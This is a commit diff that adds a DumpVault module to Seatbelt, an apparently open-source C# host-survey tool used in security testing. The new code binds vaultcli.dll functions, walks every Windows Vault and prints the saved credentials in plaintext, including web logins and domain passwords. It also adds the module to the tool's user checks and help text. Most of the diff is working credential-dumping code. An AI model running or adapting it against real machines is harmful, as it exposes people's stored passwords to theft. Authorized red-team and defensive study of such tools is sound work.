commit
09e6a01e6c
|
@ -49,6 +49,7 @@ Seatbelt is licensed under the BSD 3-Clause license.
|
|||
**SeatBelt.exe user** collects the following user data:
|
||||
|
||||
SavedRDPConnections - Saved RDP connections
|
||||
DumpVault - Dump saved credentials in Windows Vault (such as logins from Internet Explorer and Edge)
|
||||
TriageIE - Internet Explorer bookmarks and history (last 7 days)
|
||||
RecentRunCommands - Recent "run" commands
|
||||
PuttySessions - Interesting settings from any saved Putty configurations
|
||||
|
|
|
@ -25,6 +25,98 @@ namespace Seatbelt
|
|||
public static bool filter = true;
|
||||
}
|
||||
|
||||
public static class VaultCli
|
||||
{
|
||||
public enum VAULT_ELEMENT_TYPE : Int32
|
||||
{
|
||||
Undefined = -1,
|
||||
Boolean = 0,
|
||||
Short = 1,
|
||||
UnsignedShort = 2,
|
||||
Int = 3,
|
||||
UnsignedInt = 4,
|
||||
Double = 5,
|
||||
Guid = 6,
|
||||
String = 7,
|
||||
ByteArray = 8,
|
||||
TimeStamp = 9,
|
||||
ProtectedArray = 10,
|
||||
Attribute = 11,
|
||||
Sid = 12,
|
||||
Last = 13
|
||||
}
|
||||
|
||||
public enum VAULT_SCHEMA_ELEMENT_ID : Int32
|
||||
{
|
||||
Illegal = 0,
|
||||
Resource = 1,
|
||||
Identity = 2,
|
||||
Authenticator = 3,
|
||||
Tag = 4,
|
||||
PackageSid = 5,
|
||||
AppStart = 100,
|
||||
AppEnd = 10000
|
||||
}
|
||||
|
||||
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Ansi)]
|
||||
public struct VAULT_ITEM_WIN8
|
||||
{
|
||||
public Guid SchemaId;
|
||||
public IntPtr pszCredentialFriendlyName;
|
||||
public IntPtr pResourceElement;
|
||||
public IntPtr pIdentityElement;
|
||||
public IntPtr pAuthenticatorElement;
|
||||
public IntPtr pPackageSid;
|
||||
public UInt64 LastModified;
|
||||
public UInt32 dwFlags;
|
||||
public UInt32 dwPropertiesCount;
|
||||
public IntPtr pPropertyElements;
|
||||
}
|
||||
|
||||
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Ansi)]
|
||||
public struct VAULT_ITEM_WIN7
|
||||
{
|
||||
public Guid SchemaId;
|
||||
public IntPtr pszCredentialFriendlyName;
|
||||
public IntPtr pResourceElement;
|
||||
public IntPtr pIdentityElement;
|
||||
public IntPtr pAuthenticatorElement;
|
||||
public UInt64 LastModified;
|
||||
public UInt32 dwFlags;
|
||||
public UInt32 dwPropertiesCount;
|
||||
public IntPtr pPropertyElements;
|
||||
}
|
||||
|
||||
[StructLayout(LayoutKind.Explicit, CharSet = CharSet.Ansi)]
|
||||
public struct VAULT_ITEM_ELEMENT
|
||||
{
|
||||
[FieldOffset(0)] public VAULT_SCHEMA_ELEMENT_ID SchemaElementId;
|
||||
[FieldOffset(8)] public VAULT_ELEMENT_TYPE Type;
|
||||
}
|
||||
|
||||
[DllImport("vaultcli.dll")]
|
||||
public extern static Int32 VaultOpenVault(ref Guid vaultGuid, UInt32 offset, ref IntPtr vaultHandle);
|
||||
|
||||
[DllImport("vaultcli.dll")]
|
||||
public extern static Int32 VaultCloseVault(ref IntPtr vaultHandle);
|
||||
|
||||
[DllImport("vaultcli.dll")]
|
||||
public extern static Int32 VaultFree(ref IntPtr vaultHandle);
|
||||
|
||||
[DllImport("vaultcli.dll")]
|
||||
public extern static Int32 VaultEnumerateVaults(Int32 offset, ref Int32 vaultCount, ref IntPtr vaultGuid);
|
||||
|
||||
[DllImport("vaultcli.dll")]
|
||||
public extern static Int32 VaultEnumerateItems(IntPtr vaultHandle, Int32 chunkSize, ref Int32 vaultItemCount, ref IntPtr vaultItem);
|
||||
|
||||
[DllImport("vaultcli.dll", EntryPoint = "VaultGetItem")]
|
||||
public extern static Int32 VaultGetItem_WIN8(IntPtr vaultHandle, ref Guid schemaId, IntPtr pResourceElement, IntPtr pIdentityElement, IntPtr pPackageSid, IntPtr zero, Int32 arg6, ref IntPtr passwordVaultPtr);
|
||||
|
||||
[DllImport("vaultcli.dll", EntryPoint = "VaultGetItem")]
|
||||
public extern static Int32 VaultGetItem_WIN7(IntPtr vaultHandle, ref Guid schemaId, IntPtr pResourceElement, IntPtr pIdentityElement, IntPtr zero, Int32 arg5, ref IntPtr passwordVaultPtr);
|
||||
|
||||
}
|
||||
|
||||
public static class NetworkAPI
|
||||
{
|
||||
// from boboes' code at https://stackoverflow.com/questions/33935825/pinvoke-netlocalgroupgetmembers-runs-into-fatalexecutionengineerror/33939889#33939889
|
||||
|
@ -4747,6 +4839,206 @@ namespace Seatbelt
|
|||
Console.WriteLine(" [X] Exception: {0}", ex2);
|
||||
}
|
||||
}
|
||||
|
||||
public static void DumpVault()
|
||||
{
|
||||
|
||||
var OSVersion = Environment.OSVersion.Version;
|
||||
var OSMajor = OSVersion.Major;
|
||||
var OSMinor = OSVersion.Minor;
|
||||
|
||||
Type VAULT_ITEM;
|
||||
|
||||
if (OSMajor >= 6 && OSMinor >= 2)
|
||||
{
|
||||
VAULT_ITEM = typeof(VaultCli.VAULT_ITEM_WIN8);
|
||||
}
|
||||
else
|
||||
{
|
||||
VAULT_ITEM = typeof(VaultCli.VAULT_ITEM_WIN7);
|
||||
}
|
||||
|
||||
/* Helper function to extract the ItemValue field from a VAULT_ITEM_ELEMENT struct */
|
||||
object GetVaultElementValue(IntPtr vaultElementPtr)
|
||||
{
|
||||
object results;
|
||||
object partialElement = System.Runtime.InteropServices.Marshal.PtrToStructure(vaultElementPtr, typeof(VaultCli.VAULT_ITEM_ELEMENT));
|
||||
FieldInfo partialElementInfo = partialElement.GetType().GetField("Type");
|
||||
var partialElementType = partialElementInfo.GetValue(partialElement);
|
||||
|
||||
IntPtr elementPtr = (IntPtr)(vaultElementPtr.ToInt64() + 16);
|
||||
switch ((int)partialElementType)
|
||||
{
|
||||
case 7: // VAULT_ELEMENT_TYPE == String; These are the plaintext passwords!
|
||||
IntPtr StringPtr = System.Runtime.InteropServices.Marshal.ReadIntPtr(elementPtr);
|
||||
results = System.Runtime.InteropServices.Marshal.PtrToStringUni(StringPtr);
|
||||
break;
|
||||
case 0: // VAULT_ELEMENT_TYPE == bool
|
||||
results = System.Runtime.InteropServices.Marshal.ReadByte(elementPtr);
|
||||
results = (bool)results;
|
||||
break;
|
||||
case 1: // VAULT_ELEMENT_TYPE == Short
|
||||
results = System.Runtime.InteropServices.Marshal.ReadInt16(elementPtr);
|
||||
break;
|
||||
case 2: // VAULT_ELEMENT_TYPE == Unsigned Short
|
||||
results = System.Runtime.InteropServices.Marshal.ReadInt16(elementPtr);
|
||||
break;
|
||||
case 3: // VAULT_ELEMENT_TYPE == Int
|
||||
results = System.Runtime.InteropServices.Marshal.ReadInt32(elementPtr);
|
||||
break;
|
||||
case 4: // VAULT_ELEMENT_TYPE == Unsigned Int
|
||||
results = System.Runtime.InteropServices.Marshal.ReadInt32(elementPtr);
|
||||
break;
|
||||
case 5: // VAULT_ELEMENT_TYPE == Double
|
||||
results = System.Runtime.InteropServices.Marshal.PtrToStructure(elementPtr, typeof(Double));
|
||||
break;
|
||||
case 6: // VAULT_ELEMENT_TYPE == GUID
|
||||
results = System.Runtime.InteropServices.Marshal.PtrToStructure(elementPtr, typeof(Guid));
|
||||
break;
|
||||
case 12: // VAULT_ELEMENT_TYPE == Sid
|
||||
IntPtr sidPtr = System.Runtime.InteropServices.Marshal.ReadIntPtr(elementPtr);
|
||||
var sidObject = new System.Security.Principal.SecurityIdentifier(sidPtr);
|
||||
results = sidObject.Value;
|
||||
break;
|
||||
default:
|
||||
/* Several VAULT_ELEMENT_TYPES are currently unimplemented according to
|
||||
* Lord Graeber. Thus we do not implement them. */
|
||||
results = null;
|
||||
break;
|
||||
}
|
||||
return results;
|
||||
}
|
||||
/* End helper function */
|
||||
|
||||
Int32 vaultCount = 0;
|
||||
IntPtr vaultGuidPtr = IntPtr.Zero;
|
||||
var result = VaultCli.VaultEnumerateVaults(0, ref vaultCount, ref vaultGuidPtr);
|
||||
|
||||
//var result = CallVaultEnumerateVaults(VaultEnum, 0, ref vaultCount, ref vaultGuidPtr);
|
||||
|
||||
if ((int) result != 0)
|
||||
{
|
||||
throw new Exception("[ERROR] Unable to enumerate vaults. Error (0x" + result.ToString() + ")");
|
||||
}
|
||||
|
||||
// Create dictionary to translate Guids to human readable elements
|
||||
IntPtr guidAddress = vaultGuidPtr;
|
||||
Dictionary<Guid, string> vaultSchema = new Dictionary<Guid, string>();
|
||||
vaultSchema.Add(new Guid("2F1A6504-0641-44CF-8BB5-3612D865F2E5"), "Windows Secure Note");
|
||||
vaultSchema.Add(new Guid("3CCD5499-87A8-4B10-A215-608888DD3B55"), "Windows Web Password Credential");
|
||||
vaultSchema.Add(new Guid("154E23D0-C644-4E6F-8CE6-5069272F999F"), "Windows Credential Picker Protector");
|
||||
vaultSchema.Add(new Guid("4BF4C442-9B8A-41A0-B380-DD4A704DDB28"), "Web Credentials");
|
||||
vaultSchema.Add(new Guid("77BC582B-F0A6-4E15-4E80-61736B6F3B29"), "Windows Credentials");
|
||||
vaultSchema.Add(new Guid("E69D7838-91B5-4FC9-89D5-230D4D4CC2BC"), "Windows Domain Certificate Credential");
|
||||
vaultSchema.Add(new Guid("3E0E35BE-1B77-43E7-B873-AED901B6275B"), "Windows Domain Password Credential");
|
||||
vaultSchema.Add(new Guid("3C886FF3-2669-4AA2-A8FB-3F6759A77548"), "Windows Extended Credential");
|
||||
vaultSchema.Add(new Guid("00000000-0000-0000-0000-000000000000"), null);
|
||||
|
||||
for (int i = 0; i<vaultCount; i++)
|
||||
{
|
||||
// Open vault block
|
||||
object vaultGuidString = System.Runtime.InteropServices.Marshal.PtrToStructure(guidAddress, typeof(Guid));
|
||||
Guid vaultGuid = new Guid(vaultGuidString.ToString());
|
||||
guidAddress = (IntPtr) (guidAddress.ToInt64() + System.Runtime.InteropServices.Marshal.SizeOf(typeof(Guid)));
|
||||
IntPtr vaultHandle = IntPtr.Zero;
|
||||
string vaultType;
|
||||
if (vaultSchema.ContainsKey(vaultGuid))
|
||||
{
|
||||
vaultType = vaultSchema[vaultGuid];
|
||||
}
|
||||
else
|
||||
{
|
||||
vaultType = vaultGuid.ToString();
|
||||
}
|
||||
result = VaultCli.VaultOpenVault(ref vaultGuid, (UInt32)0, ref vaultHandle);
|
||||
if (result != 0)
|
||||
{
|
||||
throw new Exception("Unable to open the following vault: " + vaultType + ". Error: 0x" + result.ToString());
|
||||
}
|
||||
// Vault opened successfully! Continue.
|
||||
|
||||
// Fetch all items within Vault
|
||||
int vaultItemCount = 0;
|
||||
IntPtr vaultItemPtr = IntPtr.Zero;
|
||||
result = VaultCli.VaultEnumerateItems(vaultHandle, 512, ref vaultItemCount, ref vaultItemPtr);
|
||||
if (result != 0)
|
||||
{
|
||||
throw new Exception("[ERROR] Unable to enumerate vault items from the following vault: " + vaultType + ". Error 0x" + result.ToString());
|
||||
}
|
||||
var structAddress = vaultItemPtr;
|
||||
if (vaultItemCount > 0)
|
||||
{
|
||||
// For each vault item...
|
||||
for (int j = 1; j <= vaultItemCount; j++)
|
||||
{
|
||||
// Begin fetching vault item...
|
||||
var currentItem = System.Runtime.InteropServices.Marshal.PtrToStructure(structAddress, VAULT_ITEM);
|
||||
structAddress = (IntPtr) (structAddress.ToInt64() + System.Runtime.InteropServices.Marshal.SizeOf(VAULT_ITEM));
|
||||
IntPtr passwordVaultItem = IntPtr.Zero;
|
||||
// Field Info retrieval
|
||||
FieldInfo schemaIdInfo = currentItem.GetType().GetField("SchemaId");
|
||||
Guid schemaId = new Guid(schemaIdInfo.GetValue(currentItem).ToString());
|
||||
FieldInfo pResourceElementInfo = currentItem.GetType().GetField("pResourceElement");
|
||||
IntPtr pResourceElement = (IntPtr)pResourceElementInfo.GetValue(currentItem);
|
||||
FieldInfo pIdentityElementInfo = currentItem.GetType().GetField("pIdentityElement");
|
||||
IntPtr pIdentityElement = (IntPtr)pIdentityElementInfo.GetValue(currentItem);
|
||||
FieldInfo dateTimeInfo = currentItem.GetType().GetField("LastModified");
|
||||
UInt64 lastModified = (UInt64)dateTimeInfo.GetValue(currentItem);
|
||||
object[] vaultGetItemArgs;
|
||||
IntPtr pPackageSid = IntPtr.Zero;
|
||||
if (OSMajor >= 6 && OSMinor >= 2)
|
||||
{
|
||||
// Newer versions have package sid
|
||||
FieldInfo pPackageSidInfo = currentItem.GetType().GetField("pPackageSid");
|
||||
pPackageSid = (IntPtr) pPackageSidInfo.GetValue(currentItem);
|
||||
result = VaultCli.VaultGetItem_WIN8(vaultHandle, ref schemaId, pResourceElement, pIdentityElement, pPackageSid, IntPtr.Zero, 0, ref passwordVaultItem);
|
||||
}
|
||||
else
|
||||
{
|
||||
result = VaultCli.VaultGetItem_WIN7(vaultHandle, ref schemaId, pResourceElement, pIdentityElement, IntPtr.Zero, 0, ref passwordVaultItem);
|
||||
}
|
||||
|
||||
if (result != 0)
|
||||
{
|
||||
throw new Exception("Error occured while retrieving vault item. Error: 0x" + result.ToString());
|
||||
}
|
||||
object passwordItem = System.Runtime.InteropServices.Marshal.PtrToStructure(passwordVaultItem, VAULT_ITEM);
|
||||
FieldInfo pAuthenticatorElementInfo = passwordItem.GetType().GetField("pAuthenticatorElement");
|
||||
IntPtr pAuthenticatorElement = (IntPtr)pAuthenticatorElementInfo.GetValue(passwordItem);
|
||||
// Fetch the credential from the authenticator element
|
||||
object cred = GetVaultElementValue(pAuthenticatorElement);
|
||||
object packageSid = null;
|
||||
if (pPackageSid != IntPtr.Zero && pPackageSid != null)
|
||||
{
|
||||
packageSid = GetVaultElementValue(pPackageSid);
|
||||
}
|
||||
if (cred != null) // Indicates successful fetch
|
||||
{
|
||||
Console.WriteLine("=== Windows Vault Credential ===");
|
||||
Console.WriteLine("Vault Type : {0}", vaultType);
|
||||
object resource = GetVaultElementValue(pResourceElement);
|
||||
if (resource != null)
|
||||
{
|
||||
Console.WriteLine("Resource : {0}", resource);
|
||||
}
|
||||
object identity = GetVaultElementValue(pIdentityElement);
|
||||
if (identity != null)
|
||||
{
|
||||
Console.WriteLine("Identity : {0}", identity);
|
||||
}
|
||||
if (packageSid != null)
|
||||
{
|
||||
Console.WriteLine("PacakgeSid : {0}", packageSid);
|
||||
}
|
||||
Console.WriteLine("Credential : {0}", cred);
|
||||
// Stupid datetime
|
||||
Console.WriteLine("LastModified : {0}", System.DateTime.FromFileTimeUtc((long) lastModified));
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
public static void TriageIE()
|
||||
{
|
||||
// lists Internt explorer history (last 7 days by default) and favorites
|
||||
|
@ -5620,6 +5912,7 @@ namespace Seatbelt
|
|||
|
||||
CheckFirefox();
|
||||
CheckChrome();
|
||||
DumpVault();
|
||||
TriageIE();
|
||||
ListSavedRDPConnections();
|
||||
ListRecentRunCommands();
|
||||
|
@ -5673,6 +5966,7 @@ namespace Seatbelt
|
|||
Console.WriteLine("\r\n\r\n \"SeatBelt.exe user\" collects the following user data:\r\n");
|
||||
Console.WriteLine("\tSavedRDPConnections - Saved RDP connections");
|
||||
Console.WriteLine("\tTriageIE - Internet Explorer bookmarks and history (last 7 days)");
|
||||
Console.WriteLine("\tDumpVault - Dump saved credentials in Windows Vault (such as logins from Internet Explorer and Edge)");
|
||||
Console.WriteLine("\tRecentRunCommands - Recent \"run\" commands");
|
||||
Console.WriteLine("\tPuttySessions - Interesting settings from any saved Putty configurations");
|
||||
Console.WriteLine("\tPuttySSHHostKeys - Saved putty SSH host keys");
|
||||
|
@ -5767,6 +6061,11 @@ namespace Seatbelt
|
|||
// if TriageX(), all good
|
||||
info = type.GetMethod(arg);
|
||||
}
|
||||
else if (Regex.IsMatch(arg, @"^Dump.*"))
|
||||
{
|
||||
// if DumpX, all good
|
||||
info = type.GetMethod(arg);
|
||||
}
|
||||
else
|
||||
{
|
||||
// build List<name>()
|
||||
|
|
Loading…
Reference in New Issue